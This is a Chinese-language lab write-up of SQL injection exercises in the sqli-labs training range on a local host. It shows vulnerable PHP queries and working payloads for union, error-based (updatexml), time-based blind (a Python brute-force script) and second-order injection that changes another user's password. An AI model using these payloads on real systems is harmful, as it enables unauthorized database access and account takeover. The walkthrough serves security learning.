sqli-labs靶场中演示:
less1:
注入点为:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";get输入一个id,可以逃逸出单引号来实现sql注入。
正常的输入为,输出数据库中查询的内容。
http://127.0.0.1:8080/sqli-labs/Less-1/?id=1可以使用union 联合查询 或者报错注入 updatexml(1,conncat(),1)只能显示32位和 extractvalue()联合查询需要知道有几列,可以用order by 找出有几列 ,可以用数字表示列名。
在第四次时报错了,说明有三列:
http://127.0.0.1:8080/sqli-labs/Less-1/?id=1%27%20order%20by%204%23
那么利用union联合查询:
http://127.0.0.1:8080/sqli-labs/Less-1/?id=-1%27%20union%20select%201,user(),database()%23
less5:
报错注入: updatexml(1,conncat(),1)只能显示32位和 extractvalue()
补充:用substr((),1,32)截取前32位,可以避免数据过长出现缺失
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#注入点不变但因为输出内容改变,所有更换注入方式
#正确输出为此
echo 'You are in...........';
#错误输出为此
print_r(mysqli_error($con1));http://127.0.0.1:8080/sqli-labs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23
less9:
时间盲注:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#注入点还是不变,但是正确错误无任何返回值
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysqli_error($con1));
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}利用python实现二分查找暴力破解:
import time
import requests
url = 'http://127.0.0.1:8080/sqli-labs/Less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
#注入点使用ascii转成asc码比较数字就可以确定是那个字母,如果匹配成功就沉睡一秒
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)若有类似如下报错:
Traceback (most recent call last):
File "。。。。", line 1, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
可以win加r,cmd 使用:就可以完成
pip install requests
less11:
post输入一个用户名和密码。
注入点:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
#返回内容为:
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
print_r(mysqli_error($con1));那么依然可以沿用上面思路:
在username出输入:
a'union select 1,user()#
less24:
二次注入:入库出库两步操作
进入时被过滤无法实现
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = mysqli_real_escape_string($con1, $_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";那么在出库时则没有过滤的内容,就可以在出库时尝试sql注入
$username= $_SESSION["username"];
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";在注册账户的内容出输入Dumb'# ,然后按照要求new password里面就会是修改的Dumb中的密码.
![NSS [HNCTF 2022 WEEK3]ssssti](https://img-blog.csdnimg.cn/img_convert/b770ea8608b849b2490adf69d0361127.png)
